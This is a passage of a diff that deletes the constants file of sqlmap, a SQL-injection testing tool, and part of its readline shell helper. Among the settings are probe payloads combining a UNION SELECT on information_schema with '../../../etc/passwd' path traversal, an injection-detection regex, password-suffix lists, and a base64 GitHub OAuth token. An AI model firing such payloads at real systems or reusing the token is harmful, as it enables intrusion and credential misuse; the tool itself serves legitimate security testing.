"__PARTIAL_HEX_VALUE__" -URI_QUESTION_MARKER = "__QUESTION_MARK__" -ASTERISK_MARKER = "__ASTERISK_MARK__" -REPLACEMENT_MARKER = "__REPLACEMENT_MARK__" - -RANDOM_INTEGER_MARKER = "[RANDINT]" -RANDOM_STRING_MARKER = "[RANDSTR]" - -PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" -CHAR_INFERENCE_MARK = "%c" -PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]" - -# Regular expression used for recognition of textual content-type -TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" - -# Regular expression used for recognition of generic permission messages -PERMISSION_DENIED_REGEX = 
r"(command|permission|access)\s*(was|is)?\s*denied" - -# Regular expression used for recognition of generic maximum connection messages -MAX_CONNECTIONS_REGEX = r"max.+connections" - -# Regular expression used for extracting results from Google search -GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" - -# Regular expression used for extracting results from DuckDuckGo search -DUCKDUCKGO_REGEX = r'"u":"([^"]+)' - -# Regular expression used for extracting results from Disconnect Search -DISCONNECT_SEARCH_REGEX = r'

([^<]+)

' - -# Dummy user agent for search (if default one returns different results) -DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0" - -# Regular expression used for extracting content from "textual" tags -TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P[^<]+)" - -# Regular expression used for recognition of IP addresses -IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" - -# Regular expression used for recognition of generic "your ip has been blocked" messages -BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)" - -# Dumping characters used in GROUP_CONCAT MySQL technique -CONCAT_ROW_DELIMITER = ',' -CONCAT_VALUE_DELIMITER = '|' - -# Coefficient used for a time-based query delay checking (must be >= 7) -TIME_STDEV_COEFF = 7 - -# Minimum response time that can be even considered as delayed (not a complete requirement) -MIN_VALID_DELAYED_RESPONSE = 0.5 - -# Standard deviation after which a warning message should be displayed about connection lags -WARN_TIME_STDEV = 0.5 - -# Minimum length of usable union injected response (quick defense against substr fields) -UNION_MIN_RESPONSE_CHARS = 10 - -# Coefficient used for a union-based number of columns checking (must be >= 7) -UNION_STDEV_COEFF = 7 - -# Length of queue for candidates for time delay adjustment -TIME_DELAY_CANDIDATES = 3 - -# Default value for HTTP Accept header -HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" - -# Default value for HTTP Accept-Encoding header -HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" - -# Default timeout for running commands over backdoor -BACKDOOR_RUN_CMD_TIMEOUT = 5 - -# Maximum number of techniques used in inject.py/getValue() per one value -MAX_TECHNIQUES_PER_VALUE = 2 - -# In case of missing piece of partial union dump, buffered array must be 
flushed after certain size -MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024 - -# Suffix used for naming meta databases in DBMS(es) without explicit database name -METADB_SUFFIX = "_masterdb" - -# Minimum time response set needed for time-comparison based on standard deviation -MIN_TIME_RESPONSES = 30 - -# Minimum comparison ratio set needed for searching valid union column number based on standard deviation -MIN_UNION_RESPONSES = 5 - -# After these number of blanks at the end inference should stop (just in case) -INFERENCE_BLANK_BREAK = 10 - -# Use this replacement character for cases when inference is not able to retrieve the proper character value -INFERENCE_UNKNOWN_CHAR = '?' - -# Character used for operation "greater" in inference -INFERENCE_GREATER_CHAR = ">" - -# Character used for operation "equals" in inference -INFERENCE_EQUALS_CHAR = "=" - -# Character used for operation "not-equals" in inference -INFERENCE_NOT_EQUALS_CHAR = "!=" - -# String used for representation of unknown DBMS -UNKNOWN_DBMS = "Unknown" - -# String used for representation of unknown DBMS version -UNKNOWN_DBMS_VERSION = "Unknown" - -# Dynamicity mark length used in dynamicity removal engine -DYNAMICITY_MARK_LENGTH = 32 - -# Dummy user prefix used in dictionary attack -DUMMY_USER_PREFIX = "__dummy__" - -# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1 -DEFAULT_PAGE_ENCODING = "iso-8859-1" - -# URL used in dummy runs -DUMMY_URL = "http://foo/bar?id=1" - -# System variables -IS_WIN = subprocess.mswindows - -# The name of the operating system dependent module imported. 
The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos' -PLATFORM = os.name -PYVERSION = sys.version.split()[0] - -# DBMS system databases -MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") -MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql" -PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast") -ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME -SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") -ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\ - "MSysAccessXML", "MSysModules", "MSysModules2") -FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\ - "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\ - "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\ - "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\ - "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\ - "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") -MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN") -SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") -DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\ - "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") -HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") - -MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") -MYSQL_ALIASES = ("mysql", "my") -PGSQL_ALIASES = 
("postgresql", "postgres", "pgsql", "psql", "pg") -ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") -SQLITE_ALIASES = ("sqlite", "sqlite3") -ACCESS_ALIASES = ("msaccess", "access", "jet", "microsoft access") -FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb") -MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db") -SYBASE_ALIASES = ("sybase", "sybase sql server") -DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") -HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") - -DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) - -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES -SUPPORTED_OS = ("linux", "windows") - -DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES)) - -USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") -REFERER_ALIASES = ("ref", "referer", "referrer") -HOST_ALIASES = ("host",) - -HSQLDB_DEFAULT_SCHEMA = "PUBLIC" - -# Names that can't be used to name files on Windows OS -WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") - -# Items displayed in basic help (-h) output -BASIC_HELP_ITEMS = ( - "url", - "googleDork", - "data", - "cookie", - "randomAgent", - "proxy", - "testParameter", - "dbms", - "level", - "risk", - "tech", - "getAll", - "getBanner", - "getCurrentUser", - "getCurrentDb", - "getPasswordHashes", - "getTables", - "getColumns", - "getSchema", - "dumpTable", - "dumpAll", - 
"db", - "tbl", - "col", - "osShell", - "osPwn", - "batch", - "checkTor", - "flushSession", - "tor", - "sqlmapShell", - "wizard", - ) - -# String representation for NULL value -NULL = "NULL" - -# String representation for blank ('') value -BLANK = "" - -# String representation for current database -CURRENT_DB = "CD" - -# Regular expressions used for parsing error messages (--parse-errors) -ERROR_PARSING_REGEXES = ( - r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", - r"(?m)^(fatal|error|warning|exception):?\s*(?P.+?)$", - r"
  • Error Type:
    (?P.+?)
  • ", - r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", - ) - -# Regular expression used for parsing charset info from meta html headers -META_CHARSET_REGEX = r'(?si).*]+charset="?(?P[^"> ]+).*' - -# Regular expression used for parsing refresh info from meta html headers -META_REFRESH_REGEX = r'(?si)(?!.*?]+content="?[^">]+url=["\']?(?P[^\'">]+).*' - -# Regular expression used for parsing empty fields in tested form data -EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P[^=]+=(&|\Z))' - -# Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf -COMMON_PASSWORD_SUFFIXES = ("1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01", "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6", "18") - -# Reference: http://www.the-interweb.com/serendipity/index.php?/archives/94-A-brief-analysis-of-40,000-leaked-MySpace-passwords.html -COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "@") - -# Splitter used between requests in WebScarab log files -WEBSCARAB_SPLITTER = "### Conversation" - -# Splitter used between requests in BURP log files -BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}" - -# Regex used for parsing XML Burp saved history items -BURP_XML_HISTORY_REGEX = r'(\d+).+?[^\s=]*%s[^\s]*)\s" - -# Maximum number of threads (avoiding connection issues and/or DoS) -MAX_NUMBER_OF_THREADS = 10 - -# Minimum range between minimum and maximum of statistical set -MIN_STATISTICAL_RANGE = 0.01 - -# Minimum value for comparison ratio -MIN_RATIO = 0.0 - -# Maximum value for comparison ratio -MAX_RATIO = 1.0 - -# Character used for marking injectable position inside provided data -CUSTOM_INJECTION_MARK_CHAR = '*' - -# Other way to declare injection position -INJECT_HERE_MARK = '%INJECT HERE%' - -# Minimum chunk length used for retrieving data over error based payloads -MIN_ERROR_CHUNK_LENGTH = 8 - -# Maximum chunk length used for retrieving data over error based payloads 
-MAX_ERROR_CHUNK_LENGTH = 1024 - -# Do not escape the injected statement if it contains any of the following SQL keywords -EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK) - -# Mark used for replacement of reflected values -REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__" - -# Regular expression used for replacing border non-alphanum characters -REFLECTED_BORDER_REGEX = r"[^A-Za-z]+" - -# Regular expression used for replacing non-alphanum characters -REFLECTED_REPLACEMENT_REGEX = r".+" - -# Maximum number of alpha-numerical parts in reflected regex (for speed purposes) -REFLECTED_MAX_REGEX_PARTS = 10 - -# Chars which can be used as a failsafe values in case of too long URL encoding value -URLENCODE_FAILSAFE_CHARS = "()|," - -# Maximum length of URL encoded value after which failsafe procedure takes away -URLENCODE_CHAR_LIMIT = 2000 - -# Default schema for Microsoft SQL Server DBMS -DEFAULT_MSSQL_SCHEMA = "dbo" - -# Display hash attack info every mod number of items -HASH_MOD_ITEM_DISPLAY = 11 - -# Maximum integer value -MAX_INT = sys.maxint - -# Options that need to be restored in multiple targets run mode -RESTORE_MERGED_OPTIONS = ("col", "db", "dnsName", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user") - -# Parameters to be ignored in detection phase (upper case) -IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN") - -# Regular expression used for recognition of ASP.NET control parameters -ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$" - -# Prefix for Google analytics cookie names -GOOGLE_ANALYTICS_COOKIE_PREFIX = "__UTM" - -# Prefix for configuration overriding environment variables -SQLMAP_ENVIRONMENT_PREFIX = "SQLMAP_" - -# Turn off resume console info to avoid potential 
slowdowns -TURN_OFF_RESUME_INFO_LIMIT = 20 - -# Strftime format for results file used in multiple target mode -RESULTS_FILE_FORMAT = "results-%m%d%Y_%I%M%p.csv" - -# Official web page with the list of Python supported codecs -CODECS_LIST_PAGE = "http://docs.python.org/library/codecs.html#standard-encodings" - -# Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition) -SQL_SCALAR_REGEX = r"\A(SELECT(?!\s+DISTINCT\(?))?\s*\w*\(" - -# Option/switch values to ignore during configuration save -IGNORE_SAVE_OPTIONS = ("saveConfig",) - -# IP address of the localhost -LOCALHOST = "127.0.0.1" - -# Default port used by Tor -DEFAULT_TOR_SOCKS_PORT = 9050 - -# Default ports used in Tor proxy bundles -DEFAULT_TOR_HTTP_PORTS = (8123, 8118) - -# Percentage below which comparison engine could have problems -LOW_TEXT_PERCENT = 20 - -# These MySQL keywords can't go (alone) into versioned comment form (/*!...*/) -# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html -IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM") - -LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program" - -# After this number of misses reflective removal mechanism is turned off (for speed up reasons) -REFLECTIVE_MISS_THRESHOLD = 20 - -# Regular expression used for extracting HTML title -HTML_TITLE_REGEX = "(?P<result>[^<]+)" - -# Table used for Base64 conversion in WordPress hash cracking routine -ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" - -PICKLE_REDUCE_WHITELIST = (types.BooleanType, types.DictType, types.FloatType, types.IntType, types.ListType, types.LongType, types.NoneType, types.StringType, types.TupleType, types.UnicodeType, types.XRangeType, type(AttribDict()), type(set())) - -# Chars used to quickly distinguish if the user provided tainted parameter values -DUMMY_SQL_INJECTION_CHARS = ";()'" - -# Simple check against dummy users -DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b" - -# Extensions skipped by crawler -CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx") - -# Patterns often seen in HTTP headers containing custom injection marking character -PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)" - -# Template used for common table existence check -BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)" - -# Template used for common column existence check -BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)" - -# Payload used for checking of existence of IDS/WAF (dummier the better) -IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables 
WHERE 2>1-- ../../../etc/passwd" - -# Data inside shellcodeexec to be filled with random string -SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" - -# Vectors used for provoking specific WAF/IDS/IPS behavior(s) -WAF_ATTACK_VECTORS = ( - "", # NIL - "search=", - "file=../../../../etc/passwd", - "q=foobar", - "id=1 %s" % IDS_WAF_CHECK_PAYLOAD - ) - -# Used for status representation in dictionary attack phase -ROTATING_CHARS = ('\\', '|', '|', '/', '-') - -# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) -BIGARRAY_CHUNK_SIZE = 1024 * 1024 - -# Maximum number of socket pre-connects -SOCKET_PRE_CONNECT_QUEUE_SIZE = 3 - -# Only console display last n table rows -TRIM_STDOUT_DUMP_SIZE = 256 - -# Reference: http://stackoverflow.com/a/3168436 -# Reference: https://support.microsoft.com/en-us/kb/899149 -DUMP_FILE_BUFFER_SIZE = 1024 - -# Parse response headers only first couple of times -PARSE_HEADERS_LIMIT = 3 - -# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections -ORDER_BY_STEP = 10 - -# Maximum number of times for revalidation of a character in time-based injections -MAX_TIME_REVALIDATION_STEPS = 5 - -# Characters that can be used to split parameter values in provided command line (e.g. in --tamper) -PARAMETER_SPLITTING_REGEX = r'[,|;]' - -# Regular expression describing possible union char value (e.g. used in --union-char) -UNION_CHAR_REGEX = r'\A\w+\Z' - -# Attribute used for storing original parameter value in special cases (e.g. 
POST) -UNENCODED_ORIGINAL_VALUE = 'original' - -# Common column names containing usernames (used for hash cracking in some cases) -COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor') - -# Default delimiter in GET/POST values -DEFAULT_GET_POST_DELIMITER = '&' - -# Default delimiter in cookie values -DEFAULT_COOKIE_DELIMITER = ';' - -# Unix timestamp used for forcing cookie expiration when provided with --load-cookies -FORCE_COOKIE_EXPIRATION_TIME = "9999999999" - -# Github OAuth token used for creating an automatic Issue for unhandled exceptions -GITHUB_REPORT_OAUTH_TOKEN = "YzNkYTgyMTdjYzdjNjZjMjFjMWE5ODI5OGQyNzk2ODM1M2M0MzUyOA==" - -# Skip unforced HashDB flush requests below the threshold number of cached items -HASHDB_FLUSH_THRESHOLD = 32 - -# Number of retries for unsuccessful HashDB flush attempts -HASHDB_FLUSH_RETRIES = 3 - -# Number of retries for unsuccessful HashDB end transaction attempts -HASHDB_END_TRANSACTION_RETRIES = 3 - -# Unique milestone value used for forced deprecation of old HashDB values (e.g. 
when changing hash/pickle mechanism) -HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10)) - -# Warn user of possible delay due to large page dump in full UNION query injections -LARGE_OUTPUT_THRESHOLD = 1024 ** 2 - -# On huge tables there is a considerable slowdown if every row retrieval requires ORDER BY (most noticable in table dumping using ERROR injections) -SLOW_ORDER_COUNT_THRESHOLD = 10000 - -# Give up on hash recognition if nothing was found in first given number of rows -HASH_RECOGNITION_QUIT_THRESHOLD = 10000 - -# Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce -MAX_SINGLE_URL_REDIRECTIONS = 4 - -# Maximum total number of redirections (regardless of URL) - before assuming we're in a loop -MAX_TOTAL_REDIRECTIONS = 10 - -# Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm -MAX_DNS_LABEL = 63 - -# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content) -DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters) - -# Alphabet used for heuristic checks -HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') - -# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value -DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" - -# Length of prefix and suffix used in non-SQLI heuristic checks -NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 - -# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. 
large table dump in full UNION injections) -MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 - -# Maximum response total page size (trimmed if larger) -MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 - -# Maximum (multi-threaded) length of entry in bisection algorithm -MAX_BISECTION_LENGTH = 50 * 1024 * 1024 - -# Mark used for trimming unnecessary content in large chunks -LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__" - -# Generic SQL comment formation -GENERIC_SQL_COMMENT = "-- -" - -# Threshold value for turning back on time auto-adjustment mechanism -VALID_TIME_CHARS_RUN_THRESHOLD = 100 - -# Check for empty columns only if table is sufficiently large -CHECK_ZERO_COLUMNS_THRESHOLD = 10 - -# Boldify all logger messages containing these "patterns" -BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CloudFlare") - -# Generic www root directory names -GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www") - -# Maximum length of a help part containing switch/option name(s) -MAX_HELP_OPTION_LENGTH = 18 - -# Maximum number of connection retries (to prevent problems with recursion) -MAX_CONNECT_RETRIES = 100 - -# Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal") - -# Regular expression used for extracting ASP.NET view state values -VIEWSTATE_REGEX = r'(?i)(?P__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' - -# Regular expression used for extracting ASP.NET event validation values -EVENTVALIDATION_REGEX = r'(?i)(?P__EVENTVALIDATION[^"]*)[^>]+value="(?P[^"]+)' - -# Number of rows to generate inside the full union test for limited output 
(mustn't be too large to prevent payload length problems) -LIMITED_ROWS_TEST_NUMBER = 15 - -# Default adapter to use for bottle server -RESTAPI_DEFAULT_ADAPTER = "wsgiref" - -# Default REST-JSON API server listen address -RESTAPI_DEFAULT_ADDRESS = "127.0.0.1" - -# Default REST-JSON API server listen port -RESTAPI_DEFAULT_PORT = 8775 - -# Format used for representing invalid unicode characters -INVALID_UNICODE_CHAR_FORMAT = r"\x%02x" - -# Regular expression for XML POST data -XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z" - -# Regular expression used for detecting JSON POST data -JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z' - -# Regular expression used for detecting JSON-like POST data -JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z" - -# Regular expression used for detecting multipart POST data -MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name=" - -# Regular expression used for detecting Array-like POST data -ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER) - -# Default POST data content-type -DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8" - -# Raw text POST data content-type -PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8" - -# Length used while checking for existence of Suhosin-patch (like) protection mechanism -SUHOSIN_MAX_VALUE_LENGTH = 512 - -# Minimum size of an (binary) entry before it can be considered for dumping to disk -MIN_BINARY_DISK_DUMP_SIZE = 100 - -# Regular expression used for extracting form tags -FORM_SEARCH_REGEX = r"(?si)" - -# Maximum number of lines to save in history file -MAX_HISTORY_LENGTH = 1000 - -# Minimum field entry length needed for encoded content (hex, base64,...) 
check -MIN_ENCODED_LEN_CHECK = 5 - -# Timeout in seconds in which Metasploit remote session has to be initialized -METASPLOIT_SESSION_TIMEOUT = 300 - -# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html -LOBLKSIZE = 2048 - -# Suffix used to mark variables having keyword names -EVALCODE_KEYWORD_SUFFIX = "_KEYWORD" - -# Reference: http://www.cookiecentral.com/faq/#3.5 -NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File." - -# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens -CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf") - -# Prefixes used in brute force search for web server document root -BRUTE_DOC_ROOT_PREFIXES = { - OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"), - OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%") -} - -# Suffixes used in brute force search for web server document root -BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "data", "sites/all", "www/build") - -# String used for marking target name inside used brute force web server document root -BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%" - -# Character used as a boundary in kb.chars (preferably less frequent letter) -KB_CHARS_BOUNDARY_CHAR = 'q' - -# Letters of lower frequency used in kb.chars -KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp" - -# CSS style used in HTML dump format -HTML_DUMP_CSS_STYLE = """""" diff --git 
a/lib/core/shell.py b/lib/core/shell.py deleted file mode 100644 index 65d096d3..00000000 --- a/lib/core/shell.py +++ /dev/null @@ -1,132 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import atexit -import os - -from lib.core import readlineng as readline -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import AUTOCOMPLETE_TYPE -from lib.core.enums import OS -from lib.core.settings import MAX_HISTORY_LENGTH - -try: - import rlcompleter - - class CompleterNG(rlcompleter.Completer): - def global_matches(self, text): - """ - Compute matches when text is a simple name. - Return a list of all names currently defined in self.namespace - that match. - """ - - matches = [] - n = len(text) - - for ns in (self.namespace,): - for word in ns: - if word[:n] == text: - matches.append(word) - - return matches -except: - readline._readline = None - -def readlineAvailable(): - """ - Check if the readline is available. 
By default - it is not in Python default installation on Windows - """ - - return readline._readline is not None - -def clearHistory(): - if not readlineAvailable(): - return - - readline.clear_history() - -def saveHistory(completion=None): - if not readlineAvailable(): - return - - if completion == AUTOCOMPLETE_TYPE.SQL: - historyPath = paths.SQL_SHELL_HISTORY - elif completion == AUTOCOMPLETE_TYPE.OS: - historyPath = paths.OS_SHELL_HISTORY - else: - historyPath = paths.SQLMAP_SHELL_HISTORY - - try: - with open(historyPath, "w+"): - pass - except: - pass - - readline.set_history_length(MAX_HISTORY_LENGTH) - try: - readline.write_history_file(historyPath) - except IOError, msg: - warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg) - logger.warn(warnMsg) - -def loadHistory(completion=None): - if not readlineAvailable(): - return - - clearHistory() - - if completion == 